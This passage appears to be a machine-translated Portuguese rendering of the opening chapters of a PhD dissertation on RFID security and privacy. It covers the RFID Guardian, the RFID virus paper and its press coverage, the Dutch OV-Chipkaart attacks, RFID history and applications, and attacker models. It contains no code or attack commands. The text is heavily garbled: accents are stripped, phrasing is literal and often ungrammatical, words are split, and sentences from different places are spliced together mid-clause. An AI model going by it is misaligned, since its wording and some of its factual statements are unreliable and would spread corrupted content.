comportamental. Sem os controles adequados, atTackers pode realizar a leitura tag no autorizado e local clandestino de monitoramento de pessoas ou objetos (correlacionando tag RFID "avistamentos"). Snooping possvel por espionagem de tag / leitor de comunicao. Os criminosos podem tambm manipular Sistemas baseados em RFID (ou seja, sistemas de varejo checkout) por qualquer etiquetas RFID clonagem, modificar dados tag existente, ou impedindo que as etiquetas RFID de ser lido no primeiro lugar. Indivduos precisam de um meio com o qual eles podem monitorar e controlar o acesso para tags de RFID (incluindo as low-cost). Alm disso, o consumidor priVacy seria reforada por um meio fcil de usar RFID da coordenao de segurana mecanismos, e deve ter um controle refinado sobre RFID auditoria baseada em chave, gesto, controle de acesso e recursos de autenticao. Instalaes RFID tambm devem estar sujeitos aos mesmos tipos de auditoria de segurana e "red teaming" como qualquer outro tipo de sistema de computador. Implantadores tm a responsabilidade de auditar e testar a segurana de suas instalaes de RFID, mas eles geralmente no tm idia de como fazer isso eles mesmos. A indstria de segurana de computadores

SCE . 1,2

CONTRIBUIES

pode pegar a bola aqui, mas especialistas em segurana ainda no tm as ferramentas certas para trabalhar em o domnio de RFID. Profissionais de segurana de computador precisam de ferramentas para ajud-los a ponte a abertura, e comear a atacar RFID.

1.2. CONTRIBUIES
A pesquisa apresentada neste Ph.D. dissertao teve um impacto duplo. A principal contribuio puramente acadmico, mas esta pesquisa tambm teve uma surcada vez mais grande impacto sobre o "mundo real".

1.2.1. Acadmico
Esta dissertao apresenta o desenho, implementao e avaliao do RFID Guardian, a primeira plataforma de sempre unificada para RFID segurana e privacidade administrao. Para fins de proteo de privacidade RFID, o Guardian lembra um RFID RFID " firewall ", permitindo que os indivduos para monitorar e controlar o acesso a suas etiquetas RFID por combinando um padro de emisso leitor RFID com emulao nico tag RFID capadades. Nosso sistema proporciona uma plataforma para o uso coordenado de segurana RFID mecanismos, que oferece um controle refinado sobre RFID baseado em auditoria, homem-chavegesto, controle de acesso e recursos de autenticao. Ns temos o prottipo RFID Guardio usando off-the-shelf componentes, e nossa experincia tem mostrado que os dispositivos mveis ativos so uma valiosa ferramenta para gerenciar a segurana de RFID tags em uma variedade de aplicaes, incluindo a proteo de baixo custo tags que so incapazes para regular a sua prpria utilizao. The Guardian RFID tambm visa proporcionar um "canivete suo" para RFID de segurana, oferecendo um pacote integrado para os seguintes tipos de RFID baseado em seteste gurana: diagnstico e monitoramento de segurana, a manipulao de pacotes e filtering testes de penetrao e de canal lateral-ataques. Como um kit de ferramentas essencial para a realizao de avaliaes de risco adequada dos sistemas RFID, que pode permitir 1.2.2. Real-Worldfazer compromissos adequado entre segurana e aplicao RFID implantadores de Impact requisitos. Grande parte da cincia da computao, embora aparentemente seco e tcnico primeira vista, tem um esmagadoramente fascinante histria humana por trs dele. Felizmente, o RFID segurana / privacy pesquisa apresentada neste Ph.D. dissertao no excepo. Aqui est um relato em primeira mo subjetiva do "mundo real" os eventos que se desenrolaram em paralelo para o trabalho cientfico descrito no resto desta tese.

10

EuNTRODUO

CHAP. 1

O vrus RFID Em 15 de maro de 2006, o meu co-autores e eu publicamos um artigo intitulado "Is Your Cat Infected com um vrus de computador? '[132] na Quarta Annual IEEE Conferncia Internacional de Computao Pervasive e Comunicaes (IEEE PerCom), juntamente com um acompanhante no website http://wwww.rfidvirus.org. (Esta pesquisa descrita no captulo 4 desta dissertao.) A primeira reao ao nosso trabalho foi exuberncia irracional da imprensa. Eles foi loucura ao ouvir as palavras "vrus de RFID", ea histria foi apanhada por o New York Times, o Washington Post, Reuters, UPI, de Volkskrant, Comcomputvel, Computerworld, Computer Weekly, CNN, BBC, Fox News, MSNBC, e muitos outros impressos, radiodifuso e agncias de notcias on-line e blogs, que so listados no http://www.cs.vu.nl/ ~ ast / rfid /. No entanto, enquanto o original duas notcias do New York Times e Volkskrant manteve uma perspectiva razoavelmente equilibrada, os relatrios de acompanhamento de notcias de um elevou-se com cada vez mais sensacional reportos, culminando na fico "aspas" declarando como malwares RFID pode causar um infeco global no prazo de 24 horas. No surpreendentemente, logo aps a rpida disseminao de artigos de imprensa sensacionalista, a reao comeou. Grupos comerciais da indstria de RFID emitidos alguma declarao downjogar o valor no mundo real de nossos resultados, em uma tentativa de tranquilizar nervoso clientes. [50] Outros simpatizantes indstria RFID usado menos restries na sua escolha do texto, uma tentativa de desacreditar a nossa pesquisa, chamando-o "lixo", "semiacadmico ", e" beliche. "A indstria de antivrus liberado contraditrias negativo avaliaes de nossa pesquisa. Sophos divulgou um comunicado dizendo que a nossa pesquisa resultados foram de lixo e sem sentido no mundo real, enquanto Kaspersky liberado um comunicado de imprensa repreendendo-nos para liberar nossos achados, e chamando a nossa pesquisa Em contrapartida, outras partes da indstria de RFID nos deu uma esmagadora pos"Perigoso" e "imoral". Alguns jornalistas auto-id indstria e blogueiros apenas resposta definitivas. No prazo de 24 horas de lanamento do artigo, arquitetos-chefe de cegamente repetiram as crticas. grandes empresas produtoras de middleware RFID foram discretamente se aproximando de ns para ajudar a avaliar a segurana de seu middleware RFID. Empresas RFID, o consumidor organizaes de direitos humanos, e a indstria de antivrus foram convidando-nos a fazer consultas e / ou palestras convidadas. Ns tivemos que comear a transformar um determinado nmero de ofertas, devido as demandas que tudo isso estava colocando sobre o nosso tempo. Em meio ao caos, a nossa retrospecto, de acordo com o Google Trends, a nossa pesquisa de malwares RFID Em repapel pesquisa tambm recebeu o Prmio de Melhor Artigo de Alto Impacto no IEEE trigPerCom conferncia. ameaadas caso notcia nico maior que a tecnologia RFID j teve. Se voc digitar "RFID" no Google Trends [1], voc obter o resultado que mostrado na Figura 1.1. Existe um pico visvel no "RFID" volume de referncia de imprensa em maro de 2006. Diretamente acima do pico rtulo C, que diz "Tags RFID Vulnerveis". Este

SCE . 1,2

CONTRIBUIES

11

links para uma reportagem descrevendo a nossa pesquisa de malware RFID.

Figura 1.1: Google Trends: RFID

Isso vai mostrar que, independentemente de (ou no) a indstria RFID concorda com os resultados de nossa pesquisa sobre malwares RFID, no h dvida de que a repesquisa descrita neste Ph.D. dissertao elevou a conscincia de RFID segusegurana alimentar e questes de privacidade em grande escala global.

RFID Guardio The Guardian RFID tem tido um impacto prprio, separados da do Virus RFID. A vibrante open-source HW / SW projeto, o RFID Guardio foi um dos primeiros emuladores de RFID tag, e a primeira vez "RFID firewall ". Por esta razo, o Guardio RFID tem recebido ateno abundante na imprensa popular (ou seja, Popular Science e Scientific American). Alm disso, nossa USENIX Lisa artigo de 2006 que descreve a verso 2 do prottipo ganhou o Guardio RFID Best Paper Award. No entanto, a relevncia de emulao o Guardian tag RFID e segurana habilidades de auditoria foram destacados durante os ataques recentes do RFID baseados Holands passar Transporte Pblico, o "OV Chipkaart." O sistema de OV Chipkaart

12

EuNTRODUO

CHAP. 1

foi atacado com sucesso quatro vezes at agora: 1. Em julho de 2007, dois estudantes da Universidade de Amsterd, Pieter Siekerman e Maurits van der Schee, usou o single-use cartes MIFARE Ultralight para explorar um bug do servidor back-end. (I, desde que estes dois alunos com conselhos durante as fases iniciais de seu projeto) 2. Em dezembro de 2007, trs hackers alemo, Karsten Nohl, Hendryk Plotz, e reverter Starbug engenharia do proprietrio MIFARE Clssico Crypto-1 algoritmo. Isso ameaava a segurana do MIFARE 1K de uso mltiplo e Cartes 4K usado para assinaturas OV Chipkaart. 3. Em janeiro de 2008, Roel Verdult, um MSc. estudante da Universidade Raboud de Nijmegen, usou um emulador tag RFID para realizar uma simples, mas bem sucedida ataque de repetio no uso nico cartes MIFARE Ultralight. (Este tipo de ataque tambm possvel usar o Guardian RFID). 4. Em maro de 2008, pesquisadores da Universidade de Nijmegen Raboud conducted um ataque puramente criptogrfico clssico contra o MIFARE Crypto-1 algoritmo (parcialmente com base em resultados os hackers alemes "), levando clonagem de cartes MIFARE demonstrado 1K/4K.

O sistema de OV Chipkaart custar US $ 2 bilhes, ea seqncia rpida de ataques causado a ateno da mdia na Holanda. Por essa razo, imediatamente aps o terceiro ataque, o Parlamento holands ("Tweede Kamer") chamado de sesso plenria de emergncia para discutir o corte OV Chipkaart, durante o qual Tineke Huizinga, o Secretrio holandesa de Transportes e Obras Pblicas ("Verkeer en Waterstaat ") quase perdeu o emprego. No dia anterior sesso plenria, um pequeno grupo de ns (Roel Verdult e Wouter Teepe de Raboud Universiteit, hacker holands Rop Gonggrijp, e I) foram convidados a depor em uma audincia parlamentar holands, em relao a causa da problemas e futuro do sistema Chipkaart OV. (Tambm tivemos reunies similares com Translink, os implantadores do sistema Chipkaart OV, e Huizinga Secretrio no Ministrio holands dos Transportes.) Explicamos aos membros do Parlamento por "segurana por obscuridade" no trabalho, e discutiram como a situao em grande parte resultado de closed-source HW / SW e processos de design fechado. (Evitando assim parecer oportuno sobre o sistema arquitetura, e uma auditoria de segurana adequada.) Sugerimos que o Parlamento holands olhar para o Instituto Nacional de Padres e Tecnologia (NIST) dos EUA como um exemplo de como incorporar padres abertos e de reviso por pares na concepo de infra-estrutura nacional crtica.

SCE . 1,2

CONTRIBUIES

13

Figura 1.2: Depondo no Parlamento holands

Pelo menos um dos membros do parlamento holands levou nossa mensagem para o corao. Parmembro peu Wijnand Duyvendak (GroenLinks) abriu a "Kamer Tweede" sesso com as seguintes palavras: [29] ... Het debat mais de symbool Staat OV-chipcard ook, onder-zo vonden wij gisteren bij de hoorzitting letterlijk aan den lijve, voor de keuze: aberto de software geheime. Het failliet van de geheime GESLOTEN software Kwam gisteren aan het licht scherp. GroenLinks pleit er calcanhar al lang dat voor de overheid moet gaan werken encontrou aberta source software. Gisteren werd pijnlijk duidelijk dat wij misschien een heel hoge prijs moeten voor het Betalen Feit dat d'Eze Raad bij de OV-chipcard niet opgevolgd. Het lijkt erop dat alle verantwoordelijken Zich de risico de van de GESLOTEN geheime software op geen enkele Manier hebben gerealiseerd.

Que se traduz em: ... O debate sobre o OV-carto com chip simblico, j que descoEred em primeira mo na audincia de ontem, para a escolha: aberto ou fechado software. A falncia do software de cdigo fechado brilhou solidamente no centro das atenes ontem. GroenLinks (um partido poltico holands) tem pediu por um longo tempo que o governo deve trabalhar com opensoftware de fonte. Ontem, tornou-se dolorosamente bvio para que possamos pagar um preo elevado devido ao fato de que este conselho no foi seguido para o carto com chip OV. Parece que a responsabilidade pelos riscos surarredondamento o uso de software secreto fechado no foi aceite no qualquer forma. "

14

EuNTRODUO

CHAP. 1

Ns (os pesquisadores RU, Rop Gonggrijp e I) tm reunies de acompanhamento schedprogramadas com ambos Translink e do Ministrio holands dos Transportes. Nossa inteno para empurrar as vrias partes no sentido de auditoria independente e remendar o curaluguel OV sistema Chipkaart - mas apenas como um meio de ganhar tempo para o desenvolvimento de um sistema de pagamento de transporte pblico novo que far uso de design aberto processos, open-source HW / SW, e bem conhecidos algoritmos criptogrficos abertos. (Em vez da "segurana pela obscuridade" atual). Apesar do fato de que o Ministrio holands dos Transportes e Translink so escuta ing para ns, no sei se eles vo seguir os nossos conselhos. S o tempo dir.

1.3. ESTRUTURA DA DISSERTAO


O restante desta dissertao est estruturado da seguinte forma: Captulo 1 - Introduo Este captulo introduz os temas principais e motivao para o nosso trabalho, e descreve o seu impacto acadmico e do mundo real. Captulo 2 - Identificao por Rdio Frequncia Este captulo descreve a tecnologia RFID, a sua infra-estrutura e aplicaes. Captulo 3 - RFID Segurana e Privacidade Este captulo d tanto de uma perspectiva histrica e moderna sobre a segurana e ameaas de privacidade em torno da tecnologia RFID, e brevemente toca contramedidas em potencial. Captulo 4 - RFID Malware Este captulo introduz o conceito de RFID malware, oferecendo provas de cdigo de conceito para: vrus explora RFID, RFID worms e RFID. Captulo 5 - RFID Guardian: Viso Geral da Plataforma Este captulo d uma viso geral do prottipo da plataforma Guardio RFID, incluindo o HW, SW, e interfaces de usurio. Captulo 6 - RFID Guardian: Operaes Primitive Este captulo descreve os blocos mais bsicos do Guardian RFID est construindo, ememulao cluindo tag, seletivo RFID jamming consulta / resposta, e Guardian Protocolo. Captulo 7 - Ferramentas para RFID de Privacidade Este captulo discute o projeto ea implementao do Guardio da RFID principais caractersticas de privacidade, incluindo a auditoria, gerenciamento de chaves, controle de acesso, e autenticao.

SCE . 1,3

SESTRUTURA DO DISSERTATION

15

Captulo 8 - Ferramentas para RFID Segurana Este captulo discute o projeto ea implementao do Guardio da RFID principais recursos de segurana, incluindo diagnsticos e monitoramento, pacote maniplao e testes de penetrao. Captulo 9 - Discusso Este captulo discute possveis ataques contra o Guardian RFID, alm de algumas questes legais pertinentes. Captulo 10 - Trabalhos Relacionados Este captulo fornece uma pesquisa de RFID segurana e de privacidade, incluindo tcnicas ofensivas e defensivas. Ele tambm compara a mais ferramentas estreitamente relacionadas com o Guardian RFID. Captulo 11 - Sntese e Concluses Este captulo apresenta uma breve recapitulao desta dissertao, e aponta algumas trabalhos futuros e lies aprendidas.

16

EuNTRODUO

CHAP. 1

CCAPTULO 2

Radio Frequency Identification


2.1. INTRODUO AO RFID
Radio Frequency Identification (RFID) o Com-quintessential Pervasive colocando tecnologia. Apontado como o substituto do cdigo de barras tradicional, RFID capacidades de identificao wireless prometem revolucionar a nossa, industrial comexperincias comerciais e assistncia mdica. O corao do utilitrio que RFID tornaGate Ering informaes sobre objetos fsicos fcil. Informaes sobre RFID tag objetos podem ser lidos atravs de barreiras fsicas, e distncia. Em linha com Mark Weiser conceito de "computao ubqua" [170], tags RFID poderia transformar nossas interaes com infra-estrutura de computao em algo subconsciente e sublime.

Figura 2.1: Philips I. Cdigo RFID Tag

18

RAdio FRequency EuDENTIFICAO

CHAP. 2

2.1.1. Perspectiva Histrica


Pr-requisito principal Radio Frequency Identification foi o advento do rdio tecnologia. Desde Guglielmo Marconi primeiro transmitido sinais de rdio em todo o Atlantic em 1901, ondas de rdio tm sido um importante meio para enviar mensagens, a partir de os pontos-e-traos do Cdigo Morse, para a transmisso de voz primeiro, em 1906. Scicaram descobriu que as ondas de rdio poderiam ser usados para mais do que apenas mensagens transmisso [91]. Em 1935, o escocs Alexander Watson-Watt mostrou como a sua nova inveno, radar, poderia usar ondas de rdio para localizar objetos fsicos [11]. Radar encontrou o seu primeiro grande aplicativo, durante a Segunda Guerra Mundial, onde ele detectou entrada aeronaves, enviando pulsos de energia de rdio e detectar os ecos que foram enviado de volta [21]. A reflexo de energia radar era uma forma de "modulao on-off", que indicaram a presena ou ausncia de uma aeronave. No entanto, os operadores de radar ainda no tinha maneira de distinguir as suas prprias foras amigas de aeronaves inimigas, que apresentou uma grande fraqueza militar.1Os alemes tentaram resolver este problema, ao mesmo tempo rolar suas aeronaves em resposta a um sinal de a estao de radar de solo [21]. Isso iria mudar a polarizao do radar reflexes, criando um blip diferenciado na radares que diferem dos outros. Este sistema bruto foi a primeira demonstrao de "ativa" de identificao RF usando elecbackscatter eletromagntica [21]. Os britnicos responderam criando o Identificao Friend or Foe (IFF) do sistema, onde transponders de longo alcance modulado ativamente do sinal de radar de entrada cho, de modo que o avio em si no tem que [11]. Paralelo ao estes desenvolvimentos, Harry Stockman de os EUA Comando de Material da Fora Area publicou a primeira descrio pblica da tecnologia RFID em seu artigo "Comucaes por Meios de Refletida Power "em 1948 [152]. O primeiro RFID especficas patente, "porttil de rdio que emitem identificador de frequncia" (patente # 4384288) 2.1.2. RFID Tags / Leitores tambm foi concedido a Charles Walton em 17 de maio de 1983 [155]. Meio sculo se passou, e uma combinao de miniaturizao (Lei de Moore), expirar as patentes RFID, os custos de produo em queda, maior desempenho, e o casamento de interesses comerciais com a tecnologia RFID (em grande parte estimulado por a formao do Centro de Auto-ID MIT em 1999) ter causado a tecnologia RFID de repente, tomado em um formulrio que agora dificilmente reconhecvel. Moderno RFID tags, como outras "pervasive" tecnologias (motes sensores, por exemplo), representam um culminandonao de evoluo no sentido de infra-estrutura sem fio e de baixo custo embutido computadores. As etiquetas RFID esto agora do tamanho de um gro de arroz, e tem lgica interna 1Alguns pessoas a hiptese de que o ataque a Pearl Harbor poderia ter sido impedido se o radar
sido capaz de identificar, bem como detectar. Aparentemente, uma estao de radar dos EUA na Diamond Head tinha visto a entrada de avies, mas negou-los como avies americanos que chegam do continente.

SCE . 2,2

A RFID PLICAES

19

(Microchip ou mquina de estado), um elemento de acoplamento (front-end analgico w / antena), e memria (programado a laser ou EEPROM). Tags passivas (E semi-ativa tags) usar o poder de leitores RFID para se comunicar, enquanto tags ativos uso da bateria de energia para maior alcance. Tag LF (125-135 kHz) geralmente pode ser lido at 30 cm de distncia, Etiquetas HF (13,56 MHz) de at 1 m de distncia, Etiquetas UHF (2,45 GHz) at 7 m de distncia, e etiquetas ativas at 100 metros ou mais. Vale a pena mencionar brevemente que nesta dissertao, "RFID" usado como um catch-all prazo para tanto "vizinhana" tags e "proximidade" contactless-smart cards. Tecnologia de vizinhana geralmente mais barato e utilizado apenas para identificao, enquanto cartes de proximidade so geralmente mais caros, e recurso adicional de funo alidade alm da identificao. Esta diferena fundamental para a tomada de utilitrio de segurana compensaes, embora os usurios finais muitas vezes no so ciente da diferena.

2.1.3. Infra-estrutura RFID

Implementaes de RFID empregar uma ampla variedade de leitores de RFID fisicamente distribudos, gateways de acesso, interfaces de gerenciamento e bancos de dados. Um exemplo tpico de um RFID back-end arquitetura o Eletrnicos Product Code Network (EPC). Este consiste em: etiquetas RFID, leitores RFID, Object filtragem de dados em servidores / correlao, Nome (ONS) resolvedores, e Informao EPC Service (EPCIS) bancos de dados.

2.2. APLICAES RFID


Supply Chain Management Electronic Article Surveillance (EAS) um bit 1forma de RFID que tem sido utilizado para fins de controle de roubo desde 1960. EAS tags, que indicam se um item tiver sido pago, geralmente so desativados em o check-out aps a compra. Por extenso, tags RFID so basicamente as tags EAS augsuplementado com armazenamento de dados e processamento adicional. Etiquetas RFID de baixo custo promessa para agilizar cadeia de suprimentos processos, desde o transporte de mercadorias atravs de docas de carregamento para gesto dos terabytes de dados coletados a partir desses bens. Varejistas como WalMart bem como a Departamento de Defesa dos EUA j esto realizando testes com RFID no nvel de pallet, caso, e item. Wal-Mart ainda, um mandato que exijam a sua 300 principais fornecedores a adotar paletes etiquetagem RFID at janeiro de 2006. Pagamento Automtico Pagamento automtico outra aplicao popular de RFID. Vrios setores da indstria realizaram ensaios de RFID avanada cashless paymento de tecnologia, a partir de RFID aumentada cartes de crdito e transporte pblico bilhetes, para RFID-like Perto Field Communications (NFC) em dispositivos de consumo. Cobrana de pedgio eletrnico usando EZ Pass- generalizada. A trans-EZ-Pass ativo der, anexado a um pra-brisa do carro, envia informaes da conta para uma praa de pedgio como a

20

RAdio FRequency EuDENTIFICAO

CHAP. 2

Figura 2.2: RFID Arquitetura: Rede EPC

SCE . 2,2

A RFID PLICAES

21

carro drives por baixo. Isto permite a deduo automtica de portagens a partir de um conta pr-paga. Enquanto os clientes a encontrar o EZ-Pass para ser quadril e moderno, o A tecnologia foi patenteada em 1977 e foi implantado desde 1980. Controle de Acesso Sem contato controle de acesso com RFID popular para garantir locais fsicos, como edifcios de escritrios e bases militares. Primeiro inventaram por Charles Walton, em 1973, o original RFID baseado em sistema de controle de acesso inenvolvidos uma fechadura eletrnica que se abriu quando apresentados com um cartochave RFID. Passivamente o carto-powered chave, vendidos por Schlage, era um circuito de 36 polegadas quadradas bordo, carregado com chips e componentes analgicos. Acesso hoje em dia, baseado em RFID cartes tm diminudo ao tamanho de um carto de crdito, e ajudar com policiamento accesso nas fronteiras de todos os tipos. O United States Department of Homeland Security (DHS) e da International Civil Aviation Organization plano (ICAO) para usar passive RFID para a polcia de acesso nos aeroportos. A ICAO quer substituir todos (aprox. 1 bilhes) passaporte com passaportes digital, que armazenam dados criptografados biomtricos em um chip de RFID, at 2015. O DHS tambm quer usar RFID passiva para registrar quem Rastreamento saindo os Etiquetados de rotas terrestres. est entrando /de animais EUA atravs com RFID animais j so comuns. As aplicaes variam da identificao de animais em fuga para o gado de rastreamento de seus pastos verdes para a freezer mercearia. Vacas e chips foram apresentados um ao outro na dcada de 1970, com os norte-americanos de construo de microondas baseado em sistemas, e os europeus a implantao indutivamente-powered sistemas. Desde ento, baseado em RFID rastreamento de animais foi usado para monitorar vacas, porcos, gatos, ces, peixes e inclusive, com o objetivo principal de controlar surtos de doenas animais como a gripe aviria ou "vaca louca-doena."

Figura 2.3: Injeo de uma vaca com um Transponder RFID - Identronix Repesquisa, 1978

22

RAdio FRequency EuDENTIFICAO

CHAP. 2

RFID tambm tem sido usado para rastrear um adicional mamferos humanos. RFID fabricantes tm criado linhas de pulseiras wearable RFID, mochilas, e vesturio, que tm monitorado os presos, as crianas da escola, e at os idosos. Apdobraram Digital Corp tambm criou uma tag RFID injetvel chamado Verichip. Este chip RFID subdrmico usado para armazenamento de dados pessoais, o que pode ser lido em locais to variados como boates e hospitais. Outras Aplicaes RFID-tagging permite que objetos fsicos a serem representadas em ciberespao e entrou em bases de dados. Os candidatos incluem roupas (a ser consultado por alimentos inteligentes mquinas de lavar roupa), embalados (a ser consultado por smart fridores), frascos de medicamentos (a ser consultado por armrios de remdios inteligentes), aluguel de carros, arbagagem line, livros da biblioteca, notas, cartas de conduo, crachs de funcionrios e mesmo pacientes cirrgicos (para evitar confuses).

2.3. A INDSTRIA RFID


O Indstria de RFID est crescendo em 2005, o mercado global de RFID foi $ 1,94 bilhes. At 2015, prev-se para chegar a 24,5 bilhes dlares [27]. No entanto, apesar o valor do RFID em si, os domnios de aplicativo que utilizam equipamentos de RFID so vale ainda mais. Um objeto com freqncia com etiquetas RFID, o continer, carrega $ 185.000 no valor de carga, em mdia, e s vezes at $ 2-3 milhes cada [101]. Produtos farmacuticos tambm so grandes bilhete itens etiquetados com RFID; Trizivir, um trs-em-um HIV drogas da GlaxoSmithKline (um dos 32 mais comumente medicamentos falsificados [118]), custa US $ 825 por ms [9]. Mas o mais importante, o varejo economia (e sua cadeia de fornecimento com freqncia tag) movimenta mais de $ 1.845 trilho de leo por ano [164]. Com estas quantidades de dinheiro em jogo, fcil ver como o sucesso de RFID em um determinado aplicativo depende de uma confivel e segura ambiente para as operaes.

CCAPTULO 3

RFID Segurana e Privacidade


3.1. INTRODUO AO RFID segurana / privacidade
Especialistas e ativistas alertam que os sistemas de RFID podem ser utilizadas para nefarious fins que vo desde violaes de segurana corporativa, ao perfil comportamental, e univigilncia universal. Claro, eles esto certos. Mas importante lembrar que os problemas assustadores tendem a inspirar solues ousadas. RFID e informaes segurana foram historicamente interligados, em um casamento casual de tecnoprogresso lgico. Ataques contra os sistemas originais IFF desde o pano de fundo para o desenvolvimento de tcnicas de segurana, tanto clssicas e modernas, que vo a partir de interferncias ao sinal de desafio-resposta de identificao. E to provvel que a RFID continuar a inspirar o progresso em segurana e privacidade na pesquisa futuro, como tem feito h dcadas.

3.1.1. Perspectiva Histrica


O mais antigo dos sistemas RFID, identificao amigo ou inimigo (IFF), sempre foi um alvo atraente militar. IFF especficas de sabotagem durante a Segunda Guerra Mundial levou a falhas em discriminar entre o inimigo e as foras amigas. Ataques contra IFF sistemas podem ser classificados nas seguintes categorias: Sniffing / Tracking As caractersticas de funcionamento de dispositivos IFF podem ser analisados, usando ferramentas como receptores de pesquisa, analisadores de pulso, e adaptadores panormica [119]. Isso permite que os avies a serem localizados e rastreados usando os sinais enviados pelo seu Transponders IFF. Em um incidente em particular durante a Segunda Guerra Mundial, British Royal Tripulaes da Fora Area (RAF) bombardeiro incorretamente acreditavam que seus sistemas IFF teve um efeito de bloqueio contra o sistema de radar alemo Wurzburg-Riese. Como resultado, algumas tripulaes de bombardeiro deliberadamente deixaram suas IFF ligado. A Luftwaffe, em seguida, de-

24

RFID S EGURANA E

PRIVACY

CHAP. 3

desempregados do sistema de Freya Flamme, que secretamente interrogado o IFF transders, tendo para obter alcance e informaes de identificao para vrios bombardeiros da RAF ao mesmo tempo. Spoofing Aeronaves inimigas foram simuladas atravs da disperso de grandes quantidades de refletindo o material para o cu. O material mais eficiente para esta finalidade folha de alumnio cortadas em tiras de metade do comprimento de onda da freqncia do radar inimigo. O britnico chamou estas tiras de "janela", e os americanos chamavam de "joio". Aeronaves aliadas dispensado milhares destes dipolos folha em cada vo sobre inimigo territrio 1[151]. Alm disso, os Aliados s vezes enviado at tiras de bales de reboque de palha [119].

Figura 3.1: Disperso Chaff de um avio na Segunda Guerra Mundial

Ataques de replay Aeronaves amigas foram simuladas com o uso de "chamariz" IFF transponders. Inimigos se quer roubar transponders autntica IFF, ou programa transponders inimigo a imitar as caractersticas de identificao IFF legtima sinais. Os alemes foram especialmente gostava de conduzir um tipo especializado de ataque spoofing, onde gravaram legtima respostas Allied IFF e jogou -los de volta quando eles mesmos foram desafiados [30].

Denial of Service IFF foi carinhosamente apelidado de "Responder or Die", devido fato de que os avies eram considerados inimigos se eles no foram capazes de enviar respostas corretas para trs IFF. Para explorar essa deciso design, anti-jamming IFF radares (como o Jadwiga-4) foram desenvolvidos, que realizou Denial of Service
1Grande do interior alemo tornou-se cheio de palha, que foi posteriormente reas usada pelos nativos para decorar suas rvores de Natal.

SCE . 3,2

ATTACKER MODELO

25

ataques a sistemas IFF. Estes ataques foram eficazes porque o degradadas capacidade de discriminar amigvel de aeronaves inimigas, possivelmente resultando na falta de fratricdio ou uma hesitao para abater avies inimigos.

3.2. MODELO atacante


Moderna tecnologia RFID est entrando em tempos excitantes: os padres so solidificando, Preos tag RFID esto mergulhando o nariz, e os mandatos dos dois maiores defensores de RFID - o governo dos EUA e Wal-Mart - motivar os ensaios RFID em escala global escala. InformationWeek apelidado de RFID como uma das "Cinco Disruptive Technologies Para assistir em 2007 "[153]. Mas como o crescimento RFID atrai a ateno da mdia, personagens indesejveis podem tambm comeam a tomar conhecimento. Dinheiro mobiliza criminosos que so criativos na encontrar maneiras de roub-lo. Defesa RFID de segurana principal a sua curva de aprendizagem, mas implantadores no deve presumir que os criminosos sero tecnofbico. Financeiramente atacantes motivados, h muito tempo abraou a Internet, juntamente com outros emergentes tecnologias como mensagens instantneas e MySpace, e usou-os para extorquir grandes somas de dinheiro de empresas e indivduos. Na verdade, financeiramente motivado ataques de base tecnolgica esto em ascenso: de acordo com um estudo da Symantec [82], mais da metade das recentes ameaas da Internet grandes tentou colheita pessoal informao, um sinal de que o ganho financeiro est por trs dos ataques (ie, atravs de spam, phishing, e botnets). Trojans, worms, vrus e roubar usernames e senhas para sites financeiros e recursos roubo de identidade foram encontrados em 54% dos top-50 amostras de cdigos maliciosos detectados pela Symantec em 2005. Estas tendncias sugerem que a tecnologia RFID pode tambm se tornar um popular tarobter, uma vez que os criminosos determinar que ele seja rentvel. Os pargrafos seguintes 3.2.1. Tipos de conceito lgico, mas inexplorado de RFID Crimeware - Ataques focados refletir sobre o atacante obteno de retornos financeiros no contexto de Radio Frequency Identification (RFID). At agora, os atacantes mais destacados RFID tm sido estudantes de ps-graduao. Que no um problema, porque, apesar de sua pobreza, estudantes de graduao tm boas intenes e um lucro limitado. No entanto, o modelo de atacante no pode continuar a ser o caminho, com fins lucrativos atacantes so susceptveis de aparecer, uma vez RFID torna-se suficientemente generalizada. Paralelo com a situao actual com malware Internet, RFID pode, ento, atacantes rosto que variam de midos furados com o crime organizado.

26

RFID S EGURANA E

PRIVACY

CHAP. 3

Low-Budget atacantes Low-Budget atacantes, (Tambm conhecido como "script kiddies"), so susceptveis de aparecer uma vez ataques simples (ou totalmente automatizado) RFID tm provado ser rentvel. Internet lore tem proporcionado muitos exemplos histricos de atacantes como, por exemplo, em 2001-2002, JuJu Jiang plantou um keylogger comercial em lojas Kinko thirteen em Manhattan [128]. Por quase dois anos, ele colecionou mais de 450 on-line de banco ing usernames e senhas de clientes Kinko. O hijinks terminou quando investigadores descobriram e traou o endereo IP de Jiang volta para sua me apartment. A tecnologia RFID tambm provvel para enfrentar fins lucrativos atacantes que se concentram em de baixo risco, metas facilmente explorveis. O mais simples baseado em RFID ataques so fsicos ataques (ou seja, gaiolas de Faraday, tag swapping) ou tag no autorizado consulta / reescrever usando um padro OEM leitor RFID. Mas ainda mais ataques sofisticados (isto , tag spoofing, jamming tag seletiva), provavelmente, chegar ao alcance da habilidade de baixa atacantes, to barato dispositivos RFID emulao tag deve aparecer em breve no mercado comercial (ou seja OpenPICC [174]). Alta Oramento atacantes Alto oramento atacantes so mais preocupantes. Focando mais ampla escala de alto lucro operaes, o crime organizado poderia adotar RFID como uma ferramenta nova e brilhante para sua pr-existentes atividades criminosas. Criminosos nunca provaram ser tecnofbico; a Internet j se tornou um playground para os seus extorso e roubo de identidade actividades. E, alm disso, se RFID utilizada para identificar e seguro big-ticket articulos como bulk-farmacuticos, passaportes, dinheiro e carros, o crime organizado certamente abraar o uso de RFID crimeware. Os atacantes no-tradicionais Atacantes no-tradicionais pode tambm surgir sob a forma de empresas e govgovernos. Essas entidades poderiam (talvez inadvertidamente) o abuso das capacidades de RFID avanada coleta de dados, assim borrar a linha entre atacantes e "o estabelecimento. "Para evitar erros, o conjunto RFID de pessoal dados devem ser regulados e monitorados para o cumprimento legal.

3.2.2. Motivos atacante


As vrias classes de atacantes tm objetivos diferentes, que podem incluir: RFID vandalismo (de dados ou objetos fsicos), RFID identidade roubo (de informaes pessoais / financeiros), e RFID roubo (de dados ou physobjetos ical).

SCE . 3,2

ATTACKER MODELO

27

RFID-Enabled Vandalismo

